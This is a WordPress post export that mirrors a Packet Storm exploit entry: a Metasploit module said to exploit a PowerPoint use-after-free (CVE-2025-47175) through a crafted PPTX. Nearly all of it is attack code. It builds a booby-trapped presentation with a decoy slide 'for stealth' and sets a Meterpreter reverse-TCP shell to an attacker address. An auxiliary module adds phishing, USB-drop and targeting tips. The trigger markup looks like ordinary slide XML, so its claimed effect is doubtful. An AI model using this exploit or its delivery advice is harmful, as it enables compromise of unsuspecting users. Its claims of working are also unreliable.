{"id":28306,"date":"2025-12-02T15:33:20","date_gmt":"2025-12-02T15:33:20","guid":{"rendered":"http:\/\/localhost\/?p=28306"},"modified":"2025-12-02T15:33:20","modified_gmt":"2025-12-02T15:33:20","slug":"microsoft-powerpoint-2019-use-after-free","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=28306","title":{"rendered":"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315"},"content":{"rendered":"

{“lastseen”:”2025-12-02T19:42:10″,”description”:”This Metasploit module exploits a use-after-free vulnerability in Microsoft PowerPoint that allows remote code execution when a user opens a specially crafted PPTX file. The vulnerability is triggered through manipulated shape objects in the PowerPoint…”,”published”:”2025-12-02T00:00:00″,”modified”:”2025-12-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free”,”source”:””,”references”:””,”id”:”PACKETSTORM:212315″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-47175″],”sourceData”:”=============================================================================================================================================\\n | # Title : Microsoft PowerPoint 2019 Use-After-Free Remote Code Execution |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.microsoft.com\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/206209\/ \\u0026 CVE\u20112025\u201147175\\n \\n [+] Summary : This module exploits a Use-After-Free vulnerability in Microsoft PowerPoint\\n (CVE-2025-47175) that allows remote code execution when a user opens a\\n specially crafted PPTX file. The vulnerability is triggered through\\n manipulated shape objects in the PowerPoint presentation.\\n \\n \\t\\t\\t\\n [+] POC : \\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = NormalRanking\\n \\n include Msf::Exploit::FILEFORMAT\\n include Msf::Exploit::EXE\\n \\n def initialize(info = {})\\n super(update_info(info,\\n ‘Name’ =\\u003e ‘Microsoft PowerPoint Use-After-Free Remote Code Execution’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a Use-After-Free vulnerability in Microsoft PowerPoint\\n (CVE-2025-47175) that allows remote code execution when a user opens a\\n specially crafted PPTX file. The vulnerability is triggered through\\n manipulated shape objects in the PowerPoint presentation.\\n },\\n ‘Author’ =\\u003e [\\n ‘Mohammed Idrees Banyamer’, # Original discovery and PoC\\n ‘indoushka’ # Metasploit module\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-47175’],\\n [‘URL’, ‘https:\/\/packetstorm.news\/files\/author\/7697\/1’],\\n ],\\n ‘DefaultOptions’ =\\u003e {\\n ‘EXITFUNC’ =\\u003e ‘process’,\\n ‘DisablePayloadHandler’ =\\u003e false\\n },\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e [ARCH_X86, ARCH_X64],\\n ‘Payload’ =\\u003e {\\n ‘Space’ =\\u003e 4096,\\n ‘DisableNops’ =\\u003e true,\\n ‘BadChars’ =\\u003e ”\\n },\\n ‘Targets’ =\\u003e [\\n [\\n ‘Microsoft PowerPoint 2019 \/ Office 365’,\\n {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_X64\\n }\\n ],\\n [\\n ‘Microsoft PowerPoint 2016’,\\n {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_X86\\n }\\n ]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-07-02’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [FIRST_ATTEMPT_FAIL],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, SCREEN_EFFECTS]\\n }))\\n \\n register_options([\\n OptString.new(‘FILENAME’, [true, ‘The PPTX file name’, ‘exploit_cve_2025_47175.pptx’]),\\n OptString.new(‘SHAPE_NAME’, [true, ‘Malicious shape name’, ‘MaliciousShape’]),\\n OptInt.new(‘SHAPE_ID’, [true, ‘Shape ID for exploitation’, 1234]),\\n OptString.new(‘TRIGGER_TEXT’, [true, ‘Text to display in slide’, ‘Important Presentation – Please Review’])\\n ])\\n end\\n \\n def exploit\\n # Generate the malicious PPTX file\\n pptx_data = generate_pptx\\n \\n file_create(pptx_data)\\n print_status(\\”Malicious PPTX file created: #{datastore[‘FILENAME’]}\\”)\\n end\\n \\n def generate_pptx\\n # Create the PPTX structure in memory\\n pptx = Rex::Zip::Archive.new\\n \\n # [Content_Types].xml\\n content_types = %Q|\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\” standalone=\\”yes\\”?\\u003e\\n \\u003cTypes xmlns=\\”http:\/\/schemas.openxmlformats.org\/package\/2006\/content-types\\”\\u003e\\n \\u003cDefault Extension=\\”rels\\” ContentType=\\”application\/vnd.openxmlformats-package.relationships+xml\\”\/\\u003e\\n \\u003cDefault Extension=\\”xml\\” ContentType=\\”application\/xml\\”\/\\u003e\\n \\u003cDefault Extension=\\”jpeg\\” ContentType=\\”image\/jpeg\\”\/\\u003e\\n \\u003cOverride PartName=\\”\/ppt\/presentation.xml\\” ContentType=\\”application\/vnd.openxmlformats-officedocument.presentationml.presentation.main+xml\\”\/\\u003e\\n \\u003cOverride PartName=\\”\/ppt\/slides\/slide1.xml\\” ContentType=\\”application\/vnd.openxmlformats-officedocument.presentationml.slide+xml\\”\/\\u003e\\n \\u003cOverride PartName=\\”\/ppt\/slides\/slide2.xml\\” ContentType=\\”application\/vnd.openxmlformats-officedocument.presentationml.slide+xml\\”\/\\u003e\\n \\u003cOverride PartName=\\”\/ppt\/slides\/_rels\/slide1.xml.rels\\” ContentType=\\”application\/vnd.openxmlformats-package.relationships+xml\\”\/\\u003e\\n \\u003cOverride PartName=\\”\/ppt\/slides\/_rels\/slide2.xml.rels\\” ContentType=\\”application\/vnd.openxmlformats-package.relationships+xml\\”\/\\u003e\\n \\u003cOverride PartName=\\”\/ppt\/_rels\/presentation.xml.rels\\” ContentType=\\”application\/vnd.openxmlformats-package.relationships+xml\\”\/\\u003e\\n \\u003c\/Types\\u003e|\\n \\n pptx.add_file(‘[Content_Types].xml’, content_types)\\n \\n # _rels\/.rels\\n rels_root = %Q|\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\” standalone=\\”yes\\”?\\u003e\\n \\u003cRelationships xmlns=\\”http:\/\/schemas.openxmlformats.org\/package\/2006\/relationships\\”\\u003e\\n \\u003cRelationship Id=\\”rId1\\” Type=\\”http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/officeDocument\\” Target=\\”ppt\/presentation.xml\\”\/\\u003e\\n \\u003c\/Relationships\\u003e|\\n \\n pptx.add_file(‘_rels\/.rels’, rels_root)\\n \\n # ppt\/presentation.xml\\n presentation = %Q|\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\” standalone=\\”yes\\”?\\u003e\\n \\u003cp:presentation xmlns:a=\\”http:\/\/schemas.openxmlformats.org\/drawingml\/2006\/main\\”\\n xmlns:r=\\”http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\\”\\n xmlns:p=\\”http:\/\/schemas.openxmlformats.org\/presentationml\/2006\/main\\”\\u003e\\n \\u003cp:sldMasterIdLst\\u003e\\n \\u003cp:sldMasterId id=\\”2147483648\\” r:id=\\”rId1\\”\/\\u003e\\n \\u003c\/p:sldMasterIdLst\\u003e\\n \\u003cp:sldIdLst\\u003e\\n \\u003cp:sldId id=\\”256\\” r:id=\\”rId2\\”\/\\u003e\\n \\u003cp:sldId id=\\”257\\” r:id=\\”rId3\\”\/\\u003e\\n \\u003c\/p:sldIdLst\\u003e\\n \\u003cp:sldSz cx=\\”9144000\\” cy=\\”6858000\\” type=\\”screen4x3\\”\/\\u003e\\n \\u003cp:notesSz cx=\\”6858000\\” cy=\\”9144000\\”\/\\u003e\\n \\u003c\/p:presentation\\u003e|\\n \\n pptx.add_file(‘ppt\/presentation.xml’, presentation)\\n \\n # ppt\/_rels\/presentation.xml.rels\\n pres_rels = %Q|\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\” standalone=\\”yes\\”?\\u003e\\n \\u003cRelationships xmlns=\\”http:\/\/schemas.openxmlformats.org\/package\/2006\/relationships\\”\\u003e\\n \\u003cRelationship Id=\\”rId1\\” Type=\\”http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/slideMaster\\” Target=\\”slideMasters\/slideMaster1.xml\\”\/\\u003e\\n \\u003cRelationship Id=\\”rId2\\” Type=\\”http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/slide\\” Target=\\”slides\/slide1.xml\\”\/\\u003e\\n \\u003cRelationship Id=\\”rId3\\” Type=\\”http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/slide\\” Target=\\”slides\/slide2.xml\\”\/\\u003e\\n \\u003c\/Relationships\\u003e|\\n \\n pptx.add_file(‘ppt\/_rels\/presentation.xml.rels’, pres_rels)\\n \\n # Create malicious slide 1 (trigger slide)\\n slide1 = generate_malicious_slide\\n pptx.add_file(‘ppt\/slides\/slide1.xml’, slide1)\\n \\n # Create slide 2 (normal slide for stealth)\\n slide2 = generate_normal_slide\\n pptx.add_file(‘ppt\/slides\/slide2.xml’, slide2)\\n \\n # Slide relationships\\n slide1_rels = %Q|\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\” standalone=\\”yes\\”?\\u003e\\n \\u003cRelationships xmlns=\\”http:\/\/schemas.openxmlformats.org\/package\/2006\/relationships\\”\\u003e\\n \\u003cRelationship Id=\\”rId1\\” Type=\\”http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/slideLayout\\” Target=\\”..\/slideLayouts\/slideLayout1.xml\\”\/\\u003e\\n \\u003c\/Relationships\\u003e|\\n \\n pptx.add_file(‘ppt\/slides\/_rels\/slide1.xml.rels’, slide1_rels)\\n pptx.add_file(‘ppt\/slides\/_rels\/slide2.xml.rels’, slide1_rels) # Reuse same rels\\n \\n # Slide master and layout (minimal required)\\n slide_master = %Q|\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\” standalone=\\”yes\\”?\\u003e\\n \\u003cp:sldMaster xmlns:a=\\”http:\/\/schemas.openxmlformats.org\/drawingml\/2006\/main\\”\\n xmlns:r=\\”http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\\”\\n xmlns:p=\\”http:\/\/schemas.openxmlformats.org\/presentationml\/2006\/main\\”\\u003e\\n \\u003cp:cSld\\u003e\\n \\u003cp:spTree\\u003e\\n \\u003cp:nvGrpSpPr\\u003e\\n \\u003cp:cNvPr id=\\”1\\” name=\\”\\”\/\\u003e\\n \\u003cp:cNvGrpSpPr\/\\u003e\\n \\u003cp:nvPr\/\\u003e\\n \\u003c\/p:nvGrpSpPr\\u003e\\n \\u003cp:grpSpPr\/\\u003e\\n \\u003c\/p:spTree\\u003e\\n \\u003c\/p:cSld\\u003e\\n \\u003cp:clrMap bg1=\\”lt1\\” tx1=\\”dk1\\” bg2=\\”lt2\\” tx2=\\”dk2\\” accent1=\\”accent1\\” accent2=\\”accent2\\” accent3=\\”accent3\\” accent4=\\”accent4\\” accent5=\\”accent5\\” accent6=\\”accent6\\” hlink=\\”hlink\\” folHlink=\\”folHlink\\”\/\\u003e\\n \\u003c\/p:sldMaster\\u003e|\\n \\n pptx.add_file(‘ppt\/slideMasters\/slideMaster1.xml’, slide_master)\\n \\n slide_layout = %Q|\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\” standalone=\\”yes\\”?\\u003e\\n \\u003cp:sldLayout xmlns:a=\\”http:\/\/schemas.openxmlformats.org\/drawingml\/2006\/main\\”\\n xmlns:r=\\”http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\\”\\n xmlns:p=\\”http:\/\/schemas.openxmlformats.org\/presentationml\/2006\/main\\”\\u003e\\n \\u003cp:cSld\\u003e\\n \\u003cp:spTree\\u003e\\n \\u003cp:nvGrpSpPr\\u003e\\n \\u003cp:cNvPr id=\\”1\\” name=\\”\\”\/\\u003e\\n \\u003cp:cNvGrpSpPr\/\\u003e\\n \\u003cp:nvPr\/\\u003e\\n \\u003c\/p:nvGrpSpPr\\u003e\\n \\u003cp:grpSpPr\/\\u003e\\n \\u003c\/p:spTree\\u003e\\n \\u003c\/p:cSld\\u003e\\n \\u003cp:clrMap bg1=\\”lt1\\” tx1=\\”dk1\\” bg2=\\”lt2\\” tx2=\\”dk2\\” accent1=\\”accent1\\” accent2=\\”accent2\\” accent3=\\”accent3\\” accent4=\\”accent4\\” accent5=\\”accent5\\” accent6=\\”accent6\\” hlink=\\”hlink\\” folHlink=\\”folHlink\\”\/\\u003e\\n \\u003c\/p:sldLayout\\u003e|\\n \\n pptx.add_file(‘ppt\/slideLayouts\/slideLayout1.xml’, slide_layout)\\n \\n # Add slide master relationships\\n master_rels = %Q|\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\” standalone=\\”yes\\”?\\u003e\\n \\u003cRelationships xmlns=\\”http:\/\/schemas.openxmlformats.org\/package\/2006\/relationships\\”\\u003e\\n \\u003cRelationship Id=\\”rId1\\” Type=\\”http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/slideLayout\\” Target=\\”..\/slideLayouts\/slideLayout1.xml\\”\/\\u003e\\n \\u003c\/Relationships\\u003e|\\n \\n pptx.add_file(‘ppt\/slideMasters\/_rels\/slideMaster1.xml.rels’, master_rels)\\n \\n # Return the complete PPTX file\\n return pptx.pack\\n end\\n \\n def generate_malicious_slide\\n shape_id = datastore[‘SHAPE_ID’]\\n shape_name = datastore[‘SHAPE_NAME’]\\n trigger_text = datastore[‘TRIGGER_TEXT’]\\n \\n # Create the malicious slide with UAF trigger\\n slide_xml = %Q|\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\” standalone=\\”yes\\”?\\u003e\\n \\u003cp:sld xmlns:a=\\”http:\/\/schemas.openxmlformats.org\/drawingml\/2006\/main\\”\\n xmlns:r=\\”http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\\”\\n xmlns:p=\\”http:\/\/schemas.openxmlformats.org\/presentationml\/2006\/main\\”\\u003e\\n \\u003cp:cSld\\u003e\\n \\u003cp:spTree\\u003e\\n \\u003c!– Malicious shape designed to trigger UAF –\\u003e\\n \\u003cp:sp\\u003e\\n \\u003cp:nvSpPr\\u003e\\n \\u003cp:cNvPr id=\\”#{shape_id}\\” name=\\”#{shape_name}\\”\/\\u003e\\n \\u003cp:cNvSpPr\\u003e\\n \\u003ca:spLocks noGrp=\\”1\\” noRot=\\”1\\” noChangeAspect=\\”1\\”\/\\u003e\\n \\u003c\/p:cNvSpPr\\u003e\\n \\u003cp:nvPr\\u003e\\n \\u003cp:ph type=\\”title\\”\/\\u003e\\n \\u003c\/p:nvPr\\u003e\\n \\u003c\/p:nvSpPr\\u003e\\n \\u003cp:spPr\\u003e\\n \\u003ca:xfrm\\u003e\\n \\u003ca:off x=\\”914400\\” y=\\”914400\\”\/\\u003e\\n \\u003ca:ext cx=\\”7315200\\” cy=\\”1371600\\”\/\\u003e\\n \\u003c\/a:xfrm\\u003e\\n \\u003ca:prstGeom prst=\\”rect\\”\\u003e\\n \\u003ca:avLst\/\\u003e\\n \\u003c\/a:prstGeom\\u003e\\n \\u003ca:solidFill\\u003e\\n \\u003ca:srgbClr val=\\”4472C4\\”\/\\u003e\\n \\u003c\/a:solidFill\\u003e\\n \\u003ca:ln w=\\”9525\\”\\u003e\\n \\u003ca:solidFill\\u003e\\n \\u003ca:srgbClr val=\\”000000\\”\/\\u003e\\n \\u003c\/a:solidFill\\u003e\\n \\u003c\/a:ln\\u003e\\n \\u003c\/p:spPr\\u003e\\n \\u003cp:txBody\\u003e\\n \\u003ca:bodyPr rtlCol=\\”0\\” anchor=\\”ctr\\”\/\\u003e\\n \\u003ca:lstStyle\/\\u003e\\n \\u003ca:p\\u003e\\n \\u003ca:pPr algn=\\”ctr\\”\/\\u003e\\n \\u003ca:r\\u003e\\n \\u003ca:rPr lang=\\”en-US\\” sz=\\”4400\\” b=\\”1\\”\\u003e\\n \\u003ca:solidFill\\u003e\\n \\u003ca:srgbClr val=\\”FFFFFF\\”\/\\u003e\\n \\u003c\/a:solidFill\\u003e\\n \\u003c\/a:rPr\\u003e\\n \\u003ca:t\\u003e#{trigger_text}\\u003c\/a:t\\u003e\\n \\u003c\/a:r\\u003e\\n \\u003c\/a:p\\u003e\\n \\u003c\/p:txBody\\u003e\\n \\u003c\/p:sp\\u003e\\n \\n \\u003c!– Additional shapes to increase exploitation reliability –\\u003e\\n \\u003cp:sp\\u003e\\n \\u003cp:nvSpPr\\u003e\\n \\u003cp:cNvPr id=\\”#{shape_id + 1}\\” name=\\”#{shape_name}_2\\”\/\\u003e\\n \\u003cp:cNvSpPr\/\\u003e\\n \\u003cp:nvPr\/\\u003e\\n \\u003c\/p:nvSpPr\\u003e\\n \\u003cp:spPr\\u003e\\n \\u003ca:xfrm\\u003e\\n \\u003ca:off x=\\”1524000\\” y=\\”3048000\\”\/\\u003e\\n \\u003ca:ext cx=\\”1828800\\” cy=\\”1828800\\”\/\\u003e\\n \\u003c\/a:xfrm\\u003e\\n \\u003ca:prstGeom prst=\\”rect\\”\\u003e\\n \\u003ca:avLst\/\\u003e\\n \\u003c\/a:prstGeom\\u003e\\n \\u003c\/p:spPr\\u003e\\n \\u003cp:txBody\\u003e\\n \\u003ca:bodyPr\/\\u003e\\n \\u003ca:lstStyle\/\\u003e\\n \\u003ca:p\\u003e\\n \\u003ca:r\\u003e\\n \\u003ca:t\\u003eAdditional Content\\u003c\/a:t\\u003e\\n \\u003c\/a:r\\u003e\\n \\u003c\/a:p\\u003e\\n \\u003c\/p:txBody\\u003e\\n \\u003c\/p:sp\\u003e\\n \\n \\u003c!– Trigger shape with crafted properties –\\u003e\\n \\u003cp:sp\\u003e\\n \\u003cp:nvSpPr\\u003e\\n \\u003cp:cNvPr id=\\”#{shape_id + 2}\\” name=\\”TriggerShape\\”\/\\u003e\\n \\u003cp:cNvSpPr\\u003e\\n \\u003ca:spLocks noGrp=\\”1\\”\/\\u003e\\n \\u003c\/p:cNvSpPr\\u003e\\n \\u003cp:nvPr\/\\u003e\\n \\u003c\/p:nvSpPr\\u003e\\n \\u003cp:spPr\\u003e\\n \\u003ca:xfrm\\u003e\\n \\u003ca:off x=\\”3048000\\” y=\\”4572000\\”\/\\u003e\\n \\u003ca:ext cx=\\”1828800\\” cy=\\”1828800\\”\/\\u003e\\n \\u003c\/a:xfrm\\u003e\\n \\u003ca:prstGeom prst=\\”roundRect\\”\\u003e\\n \\u003ca:avLst\/\\u003e\\n \\u003c\/a:prstGeom\\u003e\\n \\u003ca:gradFill rot=\\”0\\”\\u003e\\n \\u003ca:gsLst\\u003e\\n \\u003ca:gs pos=\\”0\\”\\u003e\\n \\u003ca:srgbClr val=\\”5B9BD5\\”\/\\u003e\\n \\u003c\/a:gs\\u003e\\n \\u003ca:gs pos=\\”100000\\”\\u003e\\n \\u003ca:srgbClr val=\\”2E75B5\\”\/\\u003e\\n \\u003c\/a:gs\\u003e\\n \\u003c\/a:gsLst\\u003e\\n \\u003c\/a:gradFill\\u003e\\n \\u003c\/p:spPr\\u003e\\n \\u003cp:txBody\\u003e\\n \\u003ca:bodyPr wrap=\\”square\\” rtlCol=\\”0\\”\\u003e\\n \\u003ca:spAutoFit\/\\u003e\\n \\u003c\/a:bodyPr\\u003e\\n \\u003ca:lstStyle\/\\u003e\\n \\u003ca:p\\u003e\\n \\u003ca:r\\u003e\\n \\u003ca:rPr lang=\\”en-US\\” sz=\\”1800\\”\/\\u003e\\n \\u003ca:t\\u003eClick to continue\\u003c\/a:t\\u003e\\n \\u003c\/a:r\\u003e\\n \\u003c\/a:p\\u003e\\n \\u003c\/p:txBody\\u003e\\n \\u003c\/p:sp\\u003e\\n \\u003c\/p:spTree\\u003e\\n \\u003c\/p:cSld\\u003e\\n \\u003cp:clrMapOvr\\u003e\\n \\u003ca:masterClrMapping\/\\u003e\\n \\u003c\/p:clrMapOvr\\u003e\\n \\u003c\/p:sld\\u003e|\\n \\n return slide_xml\\n end\\n \\n def generate_normal_slide\\n # Create a normal-looking second slide for stealth\\n %Q|\\u003c?xml version=\\”1.0\\” encoding=\\”UTF-8\\” standalone=\\”yes\\”?\\u003e\\n \\u003cp:sld xmlns:a=\\”http:\/\/schemas.openxmlformats.org\/drawingml\/2006\/main\\”\\n xmlns:r=\\”http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\\”\\n xmlns:p=\\”http:\/\/schemas.openxmlformats.org\/presentationml\/2006\/main\\”\\u003e\\n \\u003cp:cSld\\u003e\\n \\u003cp:spTree\\u003e\\n \\u003cp:sp\\u003e\\n \\u003cp:nvSpPr\\u003e\\n \\u003cp:cNvPr id=\\”2\\” name=\\”Title 1\\”\/\\u003e\\n \\u003cp:cNvSpPr\\u003e\\n \\u003ca:spLocks noGrp=\\”1\\”\/\\u003e\\n \\u003c\/p:cNvSpPr\\u003e\\n \\u003cp:nvPr\\u003e\\n \\u003cp:ph type=\\”title\\”\/\\u003e\\n \\u003c\/p:nvPr\\u003e\\n \\u003c\/p:nvSpPr\\u003e\\n \\u003cp:spPr\/\\u003e\\n \\u003cp:txBody\\u003e\\n \\u003ca:bodyPr\/\\u003e\\n \\u003ca:lstStyle\/\\u003e\\n \\u003ca:p\\u003e\\n \\u003ca:r\\u003e\\n \\u003ca:rPr lang=\\”en-US\\”\/\\u003e\\n \\u003ca:t\\u003eNormal Slide Content\\u003c\/a:t\\u003e\\n \\u003c\/a:r\\u003e\\n \\u003c\/a:p\\u003e\\n \\u003c\/p:txBody\\u003e\\n \\u003c\/p:sp\\u003e\\n \\u003c\/p:spTree\\u003e\\n \\u003c\/p:cSld\\u003e\\n \\u003cp:clrMapOvr\\u003e\\n \\u003ca:masterClrMapping\/\\u003e\\n \\u003c\/p:clrMapOvr\\u003e\\n \\u003c\/p:sld\\u003e|\\n end\\n end\\n \\n \\n ————————————-\\n Auxiliary Module for Payload Delivery\\n ————————————-\\n \\n ##\\n # Auxiliary module for CVE-2025-47175 payload delivery\\n ##\\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n def initialize(info = {})\\n super(update_info(info,\\n ‘Name’ =\\u003e ‘CVE-2025-47175 PowerPoint Exploit Delivery’,\\n ‘Description’ =\\u003e %q{\\n This module assists in delivering the CVE-2025-47175 PowerPoint exploit\\n through various social engineering vectors.\\n },\\n ‘Author’ =\\u003e [‘indoushka’],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [[‘CVE’, ‘2025-47175’]]\\n ))\\n \\n register_options([\\n OptString.new(‘EMAIL_SUBJECT’, [true, ‘Email subject for delivery’, ‘Important Presentation’]),\\n OptString.new(‘EMAIL_BODY’, [true, ‘Email body text’, ‘Please review the attached presentation.’]),\\n OptPath.new(‘PPTX_FILE’, [true, ‘Path to malicious PPTX file’])\\n ])\\n end\\n \\n def run\\n pptx_path = datastore[‘PPTX_FILE’]\\n \\n unless File.exist?(pptx_path)\\n print_error(\\”PPTX file not found: #{pptx_path}\\”)\\n return\\n end\\n \\n print_status(\\”CVE-2025-47175 PowerPoint Exploit Delivery\\”)\\n print_status(\\”Malicious file: #{pptx_path}\\”)\\n print_status(\\”File size: #{File.size(pptx_path)} bytes\\”)\\n \\n # Display delivery instructions\\n show_delivery_instructions\\n end\\n \\n def show_delivery_instructions\\n print_line(\\”\\n \ud83d\udce7 Delivery Methods:\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n 1. Email Attachment:\\n \u2022 Subject: #{datastore[‘EMAIL_SUBJECT’]}\\n \u2022 Body: #{datastore[‘EMAIL_BODY’]}\\n \u2022 Attach the generated PPTX file\\n \\n 2. Network Share:\\n \u2022 Place file on accessible network share\\n \u2022 Send link to target users\\n \u2022 Use convincing file name\\n \\n 3. USB Drop:\\n \u2022 Copy to USB drive with enticing name\\n \u2022 Leave in target location\\n \\n 4. Web Download:\\n \u2022 Host on web server\\n \u2022 Send download link via email\/chat\\n \\n \u26a0\ufe0f Social Engineering Tips:\\n \u2022 Use convincing presentation titles\\n \u2022 Mimic legitimate business content\\n \u2022 Target specific departments\/individuals\\n \u2022 Time delivery for maximum impact\\n \\n \ud83c\udfaf Target Environment:\\n \u2022 Microsoft PowerPoint 2019\/Office 365\\n \u2022 Unpatched versions (pre-June 2025)\\n \u2022 Windows operating system\\n \\”)\\n end\\n end\\n \\n —————————\\n Usage in Metasploit:\\n ————————–\\n # Generate malicious PPTX file\\n \\n use exploit\/windows\/fileformat\/ppt_cve_2025_47175\\n set FILENAME malicious_presentation.pptx\\n set SHAPE_NAME \\”CriticalUpdate\\”\\n set SHAPE_ID 9999\\n set TRIGGER_TEXT \\”Important Security Update – Please Review\\”\\n set PAYLOAD windows\/meterpreter\/reverse_tcp\\n set LHOST 192.168.1.100\\n set LPORT 4444\\n exploit\\n \\n # Use delivery auxiliary module\\n \\n use auxiliary\/delivery\/ppt_cve_2025_47175\\n set PPTX_FILE \/path\/to\/malicious_presentation.pptx\\n set EMAIL_SUBJECT \\”Q4 Financial Report\\”\\n set EMAIL_BODY \\”Please find attached the quarterly financial report for review.\\”\\n run\\n \\n \\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212315″,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212315\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-12-02T19:42:10″,”description”:”This Metasploit module exploits a use-after-free vulnerability in Microsoft PowerPoint that allows remote code execution when a user opens a specially crafted PPTX file. The…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-28306","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=28306\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-12-02T19:42:10″,”description”:”This Metasploit module exploits a use-after-free vulnerability in Microsoft PowerPoint that allows remote code execution when a user opens a specially crafted PPTX file. The...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=28306\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-02T15:33:20+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"17 minutes\" \/>\n<script type=\"application\/ld+json\" 